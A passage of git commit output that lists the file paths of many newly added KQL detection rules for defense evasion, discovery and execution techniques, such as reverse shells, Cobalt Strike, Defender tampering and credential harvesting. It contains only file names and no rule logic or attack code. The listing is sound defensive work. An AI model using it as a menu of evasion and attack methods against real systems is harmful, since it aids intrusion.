Evasion/uncommon_sigverif_exe_child_process.kql create mode 100644 KQL/rules/Defense Evasion/uncommon_svchost_parent_process.kql create mode 100644 KQL/rules/Defense Evasion/uninstall_crowdstrike_falcon_sensor.kql create mode 100644 KQL/rules/Defense Evasion/uninstall_sysinternals_sysmon.kql create mode 100644 KQL/rules/Defense Evasion/unmount_share_via_net_exe.kql create mode 100644 KQL/rules/Defense Evasion/use_icacls_to_hide_file_to_everyone.kql create mode 100644 KQL/rules/Defense Evasion/use_ntfs_short_name_in_command_line.kql create mode 100644 KQL/rules/Defense Evasion/use_ntfs_short_name_in_image.kql create mode 100644 KQL/rules/Defense Evasion/use_of_remote_exe.kql create mode 100644 KQL/rules/Defense Evasion/use_of_scriptrunner_exe.kql create mode 100644 KQL/rules/Defense Evasion/use_of_the_sftp_exe_binary_as_a_lolbin.kql create mode 100644 KQL/rules/Defense Evasion/use_of_ttdinject_exe.kql create mode 100644 KQL/rules/Defense Evasion/use_of_visualuiaverifynative_exe.kql create mode 100644 KQL/rules/Defense Evasion/use_of_vsiisexelauncher_exe.kql create mode 100644 KQL/rules/Defense Evasion/use_of_wfc_exe.kql create mode 100644 KQL/rules/Defense Evasion/use_short_name_path_in_image.kql create mode 100644 KQL/rules/Defense Evasion/utilityfunctions_ps1_proxy_dll.kql create mode 100644 KQL/rules/Defense Evasion/verclsid_exe_runs_com_object.kql create mode 100644 KQL/rules/Defense Evasion/virtualbox_driver_installation_or_starting_of_vms.kql create mode 100644 KQL/rules/Defense Evasion/visual_basic_command_line_compiler_usage.kql create mode 100644 KQL/rules/Defense Evasion/wab_execution_from_non_default_location.kql create mode 100644 KQL/rules/Defense Evasion/wab_wabmig_unusual_parent_or_child_processes.kql create mode 100644 KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql create mode 100644 KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql create mode 100644 KQL/rules/Defense Evasion/windows_binaries_write_suspicious_extensions.kql create mode 100644 KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql create mode 100644 KQL/rules/Defense Evasion/windows_defender_definition_files_removed.kql create mode 100644 KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql create mode 100644 KQL/rules/Defense Evasion/windows_defender_exclusions_added_registry.kql create mode 100644 KQL/rules/Defense Evasion/windows_defender_service_disabled_registry.kql create mode 100644 KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql create mode 100644 KQL/rules/Defense Evasion/windows_firewall_disabled_via_powershell.kql create mode 100644 KQL/rules/Defense Evasion/windows_kernel_debugger_execution.kql create mode 100644 KQL/rules/Defense Evasion/windows_processes_suspicious_parent_directory.kql create mode 100644 KQL/rules/Defense Evasion/winget_admin_settings_modification.kql create mode 100644 KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql create mode 100644 KQL/rules/Defense Evasion/wmic_loading_scripting_libraries.kql create mode 100644 KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql create mode 100644 KQL/rules/Defense Evasion/writing_of_malicious_files_to_the_fonts_folder.kql create mode 100644 KQL/rules/Defense Evasion/wsl_kali_linux_usage.kql create mode 100644 KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql create mode 100644 KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql create mode 100644 KQL/rules/Discovery/active_directory_database_snapshot_via_adexplorer.kql create mode 100644 KQL/rules/Discovery/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql create mode 100644 KQL/rules/Discovery/advanced_ip_scanner_file_event.kql create mode 100644 KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql create mode 100644 KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql create mode 100644 KQL/rules/Discovery/bloodhound_collection_files.kql create mode 100644 KQL/rules/Discovery/capabilities_discovery_linux.kql create mode 100644 KQL/rules/Discovery/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql create mode 100644 KQL/rules/Discovery/computer_system_reconnaissance_via_wmic_exe.kql create mode 100644 KQL/rules/Discovery/console_codepage_lookup_via_chcp.kql create mode 100644 KQL/rules/Discovery/container_residence_discovery_via_proc_virtual_fs.kql create mode 100644 KQL/rules/Discovery/crontab_enumeration.kql create mode 100644 KQL/rules/Discovery/detected_windows_software_discovery.kql create mode 100644 KQL/rules/Discovery/dirlister_execution.kql create mode 100644 KQL/rules/Discovery/discovery_of_a_system_time.kql create mode 100644 KQL/rules/Discovery/docker_container_discovery_via_dockerenv_listing.kql create mode 100644 KQL/rules/Discovery/domain_trust_discovery_via_dsquery.kql create mode 100644 KQL/rules/Discovery/driverquery_exe_execution.kql create mode 100644 KQL/rules/Discovery/enumerate_all_information_with_whoami_exe.kql create mode 100644 KQL/rules/Discovery/esxi_network_configuration_discovery_via_esxcli.kql create mode 100644 KQL/rules/Discovery/esxi_storage_information_discovery_via_esxcli.kql create mode 100644 KQL/rules/Discovery/esxi_system_information_discovery_via_esxcli.kql create mode 100644 KQL/rules/Discovery/esxi_vm_list_discovery_via_esxcli.kql create mode 100644 KQL/rules/Discovery/esxi_vsan_information_discovery_via_esxcli.kql create mode 100644 KQL/rules/Discovery/file_and_directory_discovery_linux.kql create mode 100644 KQL/rules/Discovery/file_and_directory_discovery_macos.kql create mode 100644 KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql create mode 100644 KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql create mode 100644 KQL/rules/Discovery/firewall_configuration_discovery_via_netsh_exe.kql create mode 100644 KQL/rules/Discovery/fsutil_drive_enumeration.kql create mode 100644 KQL/rules/Discovery/gathernetworkinfo_vbs_reconnaissance_script_output.kql create mode 100644 KQL/rules/Discovery/gpresult_display_group_policy_information.kql create mode 100644 KQL/rules/Discovery/group_membership_reconnaissance_via_whoami_exe.kql create mode 100644 KQL/rules/Discovery/hacktool_bloodhound_sharphound_execution.kql create mode 100644 KQL/rules/Discovery/hacktool_certify_execution.kql create mode 100644 KQL/rules/Discovery/hacktool_certipy_execution.kql create mode 100644 KQL/rules/Discovery/hacktool_sharpldapmonitor_execution.kql create mode 100644 KQL/rules/Discovery/hacktool_sharpldapwhoami_execution.kql create mode 100644 KQL/rules/Discovery/hacktool_sharpview_execution.kql create mode 100644 KQL/rules/Discovery/hacktool_soaphound_execution.kql create mode 100644 KQL/rules/Discovery/hacktool_trufflesnout_execution.kql create mode 100644 KQL/rules/Discovery/harvesting_of_wifi_credentials_via_netsh_exe.kql create mode 100644 KQL/rules/Discovery/linux_network_service_scanning_tools_execution.kql create mode 100644 KQL/rules/Discovery/linux_remote_system_discovery.kql create mode 100644 KQL/rules/Discovery/local_accounts_discovery.kql create mode 100644 KQL/rules/Discovery/local_groups_discovery_linux.kql create mode 100644 KQL/rules/Discovery/local_groups_discovery_macos.kql create mode 100644 KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql create mode 100644 KQL/rules/Discovery/local_system_accounts_discovery_linux.kql create mode 100644 KQL/rules/Discovery/local_system_accounts_discovery_macos.kql create mode 100644 KQL/rules/Discovery/macos_network_service_scanning.kql create mode 100644 KQL/rules/Discovery/macos_remote_system_discovery.kql create mode 100644 KQL/rules/Discovery/network_reconnaissance_activity.kql create mode 100644 KQL/rules/Discovery/network_sniffing_macos.kql create mode 100644 KQL/rules/Discovery/new_network_trace_capture_started_via_netsh_exe.kql create mode 100644 KQL/rules/Discovery/nltest_exe_execution.kql create mode 100644 KQL/rules/Discovery/notepad_password_files_discovery.kql create mode 100644 KQL/rules/Discovery/obfuscated_ip_download_activity.kql create mode 100644 KQL/rules/Discovery/obfuscated_ip_via_cli.kql create mode 100644 KQL/rules/Discovery/os_architecture_discovery_via_grep.kql create mode 100644 KQL/rules/Discovery/permission_check_via_accesschk_exe.kql create mode 100644 KQL/rules/Discovery/pktmon_exe_execution.kql create mode 100644 KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql create mode 100644 KQL/rules/Discovery/potential_configuration_and_service_reconnaissance_via_reg_exe.kql create mode 100644 KQL/rules/Discovery/potential_container_discovery_via_inodes_listing.kql create mode 100644 KQL/rules/Discovery/potential_discovery_activity_using_find_linux.kql create mode 100644 KQL/rules/Discovery/potential_discovery_activity_using_find_macos.kql create mode 100644 KQL/rules/Discovery/potential_discovery_activity_via_dnscmd_exe.kql create mode 100644 KQL/rules/Discovery/potential_gobrat_file_discovery_via_grep.kql create mode 100644 KQL/rules/Discovery/potential_recon_activity_using_driverquery_exe.kql create mode 100644 KQL/rules/Discovery/potential_recon_activity_via_nltest_exe.kql create mode 100644 KQL/rules/Discovery/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql create mode 100644 KQL/rules/Discovery/pua_adfind_suspicious_execution.kql create mode 100644 KQL/rules/Discovery/pua_adidnsdump_execution.kql create mode 100644 KQL/rules/Discovery/pua_advanced_ip_scanner_execution.kql create mode 100644 KQL/rules/Discovery/pua_advanced_port_scanner_execution.kql create mode 100644 KQL/rules/Discovery/pua_crassus_execution.kql create mode 100644 KQL/rules/Discovery/pua_nmap_zenmap_execution.kql create mode 100644 KQL/rules/Discovery/pua_seatbelt_execution.kql create mode 100644 KQL/rules/Discovery/pua_softperfect_netscan_execution.kql create mode 100644 KQL/rules/Discovery/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql create mode 100644 KQL/rules/Discovery/pua_trufflehog_execution.kql create mode 100644 KQL/rules/Discovery/pua_trufflehog_execution_linux.kql create mode 100644 KQL/rules/Discovery/python_initiated_connection.kql create mode 100644 KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql create mode 100644 KQL/rules/Discovery/renamed_whoami_execution.kql create mode 100644 KQL/rules/Discovery/sam_registry_hive_handle_request.kql create mode 100644 KQL/rules/Discovery/security_software_discovery_linux.kql create mode 100644 KQL/rules/Discovery/security_software_discovery_macos.kql create mode 100644 KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql create mode 100644 KQL/rules/Discovery/share_and_session_enumeration_using_net_exe.kql create mode 100644 KQL/rules/Discovery/shell_execution_gcc_linux.kql create mode 100644 KQL/rules/Discovery/shell_execution_via_find_linux.kql create mode 100644 KQL/rules/Discovery/shell_execution_via_flock_linux.kql create mode 100644 KQL/rules/Discovery/shell_execution_via_nice_linux.kql create mode 100644 KQL/rules/Discovery/shell_invocation_via_apt_linux.kql create mode 100644 KQL/rules/Discovery/suspicious_active_directory_database_snapshot_via_adexplorer.kql create mode 100644 KQL/rules/Discovery/suspicious_execution_of_hostname.kql create mode 100644 KQL/rules/Discovery/suspicious_execution_of_systeminfo.kql create mode 100644 KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql create mode 100644 KQL/rules/Discovery/suspicious_kernel_dump_using_dtrace.kql create mode 100644 KQL/rules/Discovery/suspicious_network_command.kql create mode 100644 KQL/rules/Discovery/suspicious_network_connection_to_ip_lookup_service_apis.kql create mode 100644 KQL/rules/Discovery/suspicious_query_of_machineguid.kql create mode 100644 KQL/rules/Discovery/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql create mode 100644 KQL/rules/Discovery/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql create mode 100644 KQL/rules/Discovery/suspicious_use_of_psloglist.kql create mode 100644 KQL/rules/Discovery/suspicious_where_execution.kql create mode 100644 KQL/rules/Discovery/syskey_registry_keys_access.kql create mode 100644 KQL/rules/Discovery/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql create mode 100644 KQL/rules/Discovery/system_information_discovery.kql create mode 100644 KQL/rules/Discovery/system_information_discovery_using_ioreg.kql create mode 100644 KQL/rules/Discovery/system_information_discovery_using_sw_vers.kql create mode 100644 KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql create mode 100644 KQL/rules/Discovery/system_information_discovery_via_registry_queries.kql create mode 100644 KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql create mode 100644 KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql create mode 100644 KQL/rules/Discovery/system_network_connections_discovery_linux.kql create mode 100644 KQL/rules/Discovery/system_network_connections_discovery_macos.kql create mode 100644 KQL/rules/Discovery/system_network_connections_discovery_via_net_exe.kql create mode 100644 KQL/rules/Discovery/system_network_discovery_linux.kql create mode 100644 KQL/rules/Discovery/system_network_discovery_macos.kql create mode 100644 KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql create mode 100644 KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql create mode 100644 KQL/rules/Discovery/use_of_w32tm_as_timer.kql create mode 100644 KQL/rules/Discovery/user_discovery_and_export_via_get_aduser_cmdlet.kql create mode 100644 KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql create mode 100644 KQL/rules/Discovery/whoami_as_parameter.kql create mode 100644 KQL/rules/Discovery/whoami_exe_execution_anomaly.kql create mode 100644 KQL/rules/Discovery/whoami_exe_execution_with_output_option.kql create mode 100644 KQL/rules/Execution/aadinternals_powershell_cmdlets_execution_proccesscreation.kql create mode 100644 KQL/rules/Execution/abusable_dll_potential_sideloading_from_suspicious_location.kql create mode 100644 KQL/rules/Execution/add_windows_capability_via_powershell_cmdlet.kql create mode 100644 KQL/rules/Execution/adwind_rat_jrat_file_artifact.kql create mode 100644 KQL/rules/Execution/application_removed_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/application_terminated_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/arbitrary_binary_execution_using_gup_utility.kql create mode 100644 KQL/rules/Execution/arbitrary_msi_download_via_devinit_exe.kql create mode 100644 KQL/rules/Execution/arbitrary_shell_command_execution_via_settingcontent_ms.kql create mode 100644 KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql create mode 100644 KQL/rules/Execution/base64_mz_header_in_commandline.kql create mode 100644 KQL/rules/Execution/bash_interactive_shell.kql create mode 100644 KQL/rules/Execution/binary_proxy_execution_via_dotnet_trace_exe.kql create mode 100644 KQL/rules/Execution/bpftrace_unsafe_option_usage.kql create mode 100644 KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql create mode 100644 KQL/rules/Execution/capsh_shell_invocation_linux.kql create mode 100644 KQL/rules/Execution/change_powershell_policies_to_an_insecure_level.kql create mode 100644 KQL/rules/Execution/chromium_browser_headless_execution_to_mockbin_like_site.kql create mode 100644 KQL/rules/Execution/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql create mode 100644 KQL/rules/Execution/clr_dll_loaded_via_office_applications.kql create mode 100644 KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql create mode 100644 KQL/rules/Execution/cmstp_uac_bypass_via_com_object_access.kql create mode 100644 KQL/rules/Execution/command_line_execution_with_suspicious_url_and_appdata_strings.kql create mode 100644 KQL/rules/Execution/computer_password_change_via_ksetup_exe.kql create mode 100644 KQL/rules/Execution/conhost_exe_commandline_path_traversal.kql create mode 100644 KQL/rules/Execution/conhost_spawned_by_uncommon_parent_process.kql create mode 100644 KQL/rules/Execution/csc_exe_execution_form_potentially_suspicious_parent.kql create mode 100644 KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql create mode 100644 KQL/rules/Execution/cscript_wscript_uncommon_script_extension_execution.kql create mode 100644 KQL/rules/Execution/csexec_service_file_creation.kql create mode 100644 KQL/rules/Execution/curl_web_request_with_potential_custom_user_agent.kql create mode 100644 KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql create mode 100644 KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql create mode 100644 KQL/rules/Execution/dotnet_assembly_dll_loaded_via_office_application.kql create mode 100644 KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql create mode 100644 KQL/rules/Execution/enable_bpf_kprobes_tracing.kql create mode 100644 KQL/rules/Execution/enable_microsoft_dynamic_data_exchange.kql create mode 100644 KQL/rules/Execution/esxi_vm_kill_via_esxcli.kql create mode 100644 KQL/rules/Execution/exchange_powershell_snap_ins_usage.kql create mode 100644 KQL/rules/Execution/execute_code_with_pester_bat.kql create mode 100644 KQL/rules/Execution/execute_code_with_pester_bat_as_parent.kql create mode 100644 KQL/rules/Execution/execution_of_powershell_script_in_public_folder.kql create mode 100644 KQL/rules/Execution/execution_of_script_located_in_potentially_suspicious_directory.kql create mode 100644 KQL/rules/Execution/file_decryption_using_gpg4win.kql create mode 100644 KQL/rules/Execution/file_download_from_ip_url_via_curl_exe.kql create mode 100644 KQL/rules/Execution/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql create mode 100644 KQL/rules/Execution/file_encryption_using_gpg4win.kql create mode 100644 KQL/rules/Execution/file_with_uncommon_extension_created_by_an_office_application.kql create mode 100644 KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql create mode 100644 KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql create mode 100644 KQL/rules/Execution/forfiles_command_execution.kql create mode 100644 KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql create mode 100644 KQL/rules/Execution/gac_dll_loaded_via_office_applications.kql create mode 100644 KQL/rules/Execution/hacktool_covenant_powershell_launcher.kql create mode 100644 KQL/rules/Execution/hacktool_crackmapexec_execution.kql create mode 100644 KQL/rules/Execution/hacktool_crackmapexec_powershell_obfuscation.kql create mode 100644 KQL/rules/Execution/hacktool_default_powersploit_empire_scheduled_task_creation.kql create mode 100644 KQL/rules/Execution/hacktool_empire_powershell_launch_parameters.kql create mode 100644 KQL/rules/Execution/hacktool_jlaive_in_memory_assembly_execution.kql create mode 100644 KQL/rules/Execution/hacktool_koadic_execution.kql create mode 100644 KQL/rules/Execution/hacktool_pchunter_execution.kql create mode 100644 KQL/rules/Execution/hacktool_potential_impacket_lateral_movement_activity.kql create mode 100644 KQL/rules/Execution/hacktool_redmimicry_winnti_playbook_execution.kql create mode 100644 KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql create mode 100644 KQL/rules/Execution/hacktool_sliver_c2_implant_activity_pattern.kql create mode 100644 KQL/rules/Execution/hacktool_stracciatella_execution.kql create mode 100644 KQL/rules/Execution/hardware_model_reconnaissance_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/hidden_powershell_in_link_file_pattern.kql create mode 100644 KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql create mode 100644 KQL/rules/Execution/import_powershell_modules_from_suspicious_directories_proccreation.kql create mode 100644 KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql create mode 100644 KQL/rules/Execution/insecure_proxy_doh_transfer_via_curl_exe.kql create mode 100644 KQL/rules/Execution/insecure_transfer_via_curl_exe.kql create mode 100644 KQL/rules/Execution/installation_of_wsl_kali_linux.kql create mode 100644 KQL/rules/Execution/interactive_bash_suspicious_children.kql create mode 100644 KQL/rules/Execution/jamf_mdm_execution.kql create mode 100644 KQL/rules/Execution/jamf_mdm_potential_suspicious_child_process.kql create mode 100644 KQL/rules/Execution/java_running_with_remote_debugging.kql create mode 100644 KQL/rules/Execution/jxa_in_memory_execution_via_osascript.kql create mode 100644 KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql create mode 100644 KQL/rules/Execution/linux_hacktool_execution.kql create mode 100644 KQL/rules/Execution/linux_reverse_shell_indicator.kql create mode 100644 KQL/rules/Execution/local_file_read_using_curl_exe.kql create mode 100644 KQL/rules/Execution/logged_on_user_password_change_via_ksetup_exe.kql create mode 100644 KQL/rules/Execution/macos_scripting_interpreter_applescript.kql create mode 100644 KQL/rules/Execution/malicious_base64_encoded_powershell_keywords_in_command_lines.kql create mode 100644 KQL/rules/Execution/malicious_powershell_commandlets_processcreation.kql create mode 100644 KQL/rules/Execution/malicious_powershell_scripts_filecreation.kql create mode 100644 KQL/rules/Execution/microsoft_excel_add_in_loaded_from_uncommon_location.kql create mode 100644 KQL/rules/Execution/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql create mode 100644 KQL/rules/Execution/mmc20_lateral_movement.kql create mode 100644 KQL/rules/Execution/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql create mode 100644 KQL/rules/Execution/mmc_loading_script_engines_dlls.kql create mode 100644 KQL/rules/Execution/named_pipe_created_via_mkfifo.kql create mode 100644 KQL/rules/Execution/net_webclient_casing_anomalies.kql create mode 100644 KQL/rules/Execution/network_connection_initiated_by_eqnedt32_exe.kql create mode 100644 KQL/rules/Execution/network_connection_initiated_by_regsvr32_exe.kql create mode 100644 KQL/rules/Execution/new_application_in_appcompat.kql create mode 100644 KQL/rules/Execution/new_process_created_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql create mode 100644 KQL/rules/Execution/nodejs_execution_of_javascript_file.kql create mode 100644 KQL/rules/Execution/nohup_execution.kql create mode 100644 KQL/rules/Execution/non_interactive_powershell_process_spawned.kql create mode 100644 KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql create mode 100644 KQL/rules/Execution/operator_bloopers_cobalt_strike_commands.kql create mode 100644 KQL/rules/Execution/operator_bloopers_cobalt_strike_modules.kql create mode 100644 KQL/rules/Execution/osacompile_execution_by_potentially_suspicious_applet_osascript.kql create mode 100644 KQL/rules/Execution/osacompile_run_only_execution.kql create mode 100644 KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql create mode 100644 KQL/rules/Execution/outlook_enableunsafeclientmailrules_setting_enabled.kql create mode 100644 KQL/rules/Execution/payload_decoded_and_decrypted_via_built_in_utilities.kql create mode 100644 KQL/rules/Execution/pcre_net_package_image_load.kql create mode 100644 KQL/rules/Execution/pcre_net_package_temp_files.kql create mode 100644 KQL/rules/Execution/pdq_deploy_remote_adminstartion_tool_execution.kql create mode 100644 KQL/rules/Execution/perl_inline_command_execution.kql create mode 100644 KQL/rules/Execution/php_inline_command_execution.kql create mode 100644 KQL/rules/Execution/potential_arbitrary_command_execution_via_ftp_exe.kql create mode 100644 KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql create mode 100644 KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql create mode 100644 KQL/rules/Execution/potential_binary_proxy_execution_via_cdb_exe.kql create mode 100644 KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql create mode 100644 KQL/rules/Execution/potential_cobaltstrike_process_patterns.kql create mode 100644 KQL/rules/Execution/potential_commandline_path_traversal_via_cmd_exe.kql create mode 100644 KQL/rules/Execution/potential_cookies_session_hijacking.kql create mode 100644 KQL/rules/Execution/potential_data_exfiltration_activity_via_commandline_tools.kql create mode 100644 KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql create mode 100644 KQL/rules/Execution/potential_dosfuscation_activity.kql create mode 100644 KQL/rules/Execution/potential_dropper_script_execution_via_wscript_cscript.kql create mode 100644 KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql create mode 100644 KQL/rules/Execution/potential_netcat_reverse_shell_execution.kql create mode 100644 KQL/rules/Execution/potential_perl_reverse_shell_execution.kql create mode 100644 KQL/rules/Execution/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql create mode 100644 KQL/rules/Execution/potential_php_reverse_shell.kql create mode 100644 KQL/rules/Execution/potential_powershell_command_line_obfuscation.kql create mode 100644 KQL/rules/Execution/potential_powershell_obfuscation_via_wchar_char.kql create mode 100644 KQL/rules/Execution/potential_powershell_reverseshell_connection.kql create mode 100644 KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/potential_product_reconnaissance_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/potential_rdp_session_hijacking_activity.kql create mode 100644 KQL/rules/Execution/potential_reflectdebugger_content_execution_via_werfault_exe.kql create mode 100644 KQL/rules/Execution/potential_renamed_rundll32_execution.kql create mode 100644 KQL/rules/Execution/potential_ruby_reverse_shell.kql create mode 100644 KQL/rules/Execution/potential_shelldispatch_dll_functionality_abuse.kql create mode 100644 KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql create mode 100644 KQL/rules/Execution/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/potential_winapi_calls_via_commandline.kql create mode 100644 KQL/rules/Execution/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql create mode 100644 KQL/rules/Execution/potential_xterm_reverse_shell.kql create mode 100644 KQL/rules/Execution/potentially_suspicious_child_process_of_clickonce_application.kql create mode 100644 KQL/rules/Execution/potentially_suspicious_child_process_of_vscode.kql create mode 100644 KQL/rules/Execution/potentially_suspicious_child_process_of_winrar_exe.kql create mode 100644 KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql create mode 100644 KQL/rules/Execution/potentially_suspicious_electron_application_commandline.kql create mode 100644 KQL/rules/Execution/potentially_suspicious_execution_of_pdqdeployrunner.kql create mode 100644 KQL/rules/Execution/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql create mode 100644 KQL/rules/Execution/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql create mode 100644 KQL/rules/Execution/potentially_suspicious_named_pipe_created_via_mkfifo.kql create mode 100644 KQL/rules/Execution/potentially_suspicious_webdav_lnk_execution.kql create mode 100644 KQL/rules/Execution/powershell_as_a_service_in_registry.kql create mode 100644 KQL/rules/Execution/powershell_base64_encoded_iex_cmdlet.kql create mode 100644 KQL/rules/Execution/powershell_base64_encoded_invoke_keyword.kql create mode 100644 KQL/rules/Execution/powershell_base64_encoded_reflective_assembly_load.kql create mode 100644 KQL/rules/Execution/powershell_base64_encoded_wmi_classes.kql create mode 100644 KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql create mode 100644 KQL/rules/Execution/powershell_download_and_execution_cradles.kql create mode 100644 KQL/rules/Execution/powershell_download_pattern.kql create mode 100644 KQL/rules/Execution/powershell_execution_with_potential_decryption_capabilities.kql create mode 100644 KQL/rules/Execution/powershell_inline_execution_from_a_file.kql create mode 100644 KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql create mode 100644 KQL/rules/Execution/powershell_script_execution_policy_enabled.kql create mode 100644 KQL/rules/Execution/powershell_script_run_in_appdata.kql create mode 100644 KQL/rules/Execution/process_reconnaissance_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/psexec_execution.kql create mode 100644 KQL/rules/Execution/psexec_service_child_process_execution_as_local_system.kql create mode 100644 KQL/rules/Execution/psexec_service_execution.kql create mode 100644 KQL/rules/Execution/psexec_service_file_creation.kql create mode 100644 KQL/rules/Execution/pua_advancedrun_execution.kql create mode 100644 KQL/rules/Execution/pua_nircmd_execution.kql create mode 100644 KQL/rules/Execution/pua_nircmd_execution_as_local_system.kql create mode 100644 KQL/rules/Execution/pua_nsudo_execution.kql create mode 100644 KQL/rules/Execution/pua_radmin_viewer_utility_execution.kql create mode 100644 KQL/rules/Execution/pua_runxcmd_execution.kql create mode 100644 KQL/rules/Execution/pua_wsudo_suspicious_execution.kql create mode 100644 KQL/rules/Execution/python_inline_command_execution.kql create mode 100644 KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql create mode 100644 KQL/rules/Execution/python_spawning_pretty_tty_on_windows.kql create mode 100644 KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql create mode 100644 KQL/rules/Execution/query_usage_to_exfil_data.kql create mode 100644 KQL/rules/Execution/read_contents_from_stdin_via_cmd_exe.kql create mode 100644 KQL/rules/Execution/rebuild_performance_counter_values_via_lodctr_exe.kql create mode 100644 KQL/rules/Execution/remcom_service_file_creation.kql create mode 100644 KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql create mode 100644 KQL/rules/Execution/remote_access_tool_screenconnect_remote_command_execution.kql create mode 100644 KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql create mode 100644 KQL/rules/Execution/remote_dll_load_via_rundll32_exe.kql create mode 100644 KQL/rules/Execution/remote_powershell_session_host_process_winrm_.kql create mode 100644 KQL/rules/Execution/renamed_curl_exe_execution.kql create mode 100644 KQL/rules/Execution/renamed_ftp_exe_execution.kql create mode 100644 KQL/rules/Execution/renamed_jusched_exe_execution.kql create mode 100644 KQL/rules/Execution/renamed_nircmd_exe_execution.kql create mode 100644 KQL/rules/Execution/renamed_pingcastle_binary_execution.kql create mode 100644 KQL/rules/Execution/renamed_psexec_service_execution.kql create mode 100644 KQL/rules/Execution/ruby_inline_command_execution.kql create mode 100644 KQL/rules/Execution/scheduled_cron_task_job_linux.kql create mode 100644 KQL/rules/Execution/scheduled_cron_task_job_macos.kql create mode 100644 KQL/rules/Execution/scheduled_task_creation_via_schtasks_exe.kql create mode 100644 KQL/rules/Execution/script_event_consumer_spawning_process.kql create mode 100644 KQL/rules/Execution/script_interpreter_execution_from_suspicious_folder.kql create mode 100644 KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/service_started_stopped_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/service_startuptype_change_via_powershell_set_service.kql create mode 100644 KQL/rules/Execution/service_startuptype_change_via_sc_exe.kql create mode 100644 KQL/rules/Execution/shell_execution_of_process_located_in_tmp_directory.kql create mode 100644 KQL/rules/Execution/shell_execution_via_git_linux.kql create mode 100644 KQL/rules/Execution/shell_execution_via_rsync_linux.kql create mode 100644 KQL/rules/Execution/shell_invocation_via_env_command_linux.kql create mode 100644 KQL/rules/Execution/shell_invocation_via_ssh_linux.kql create mode 100644 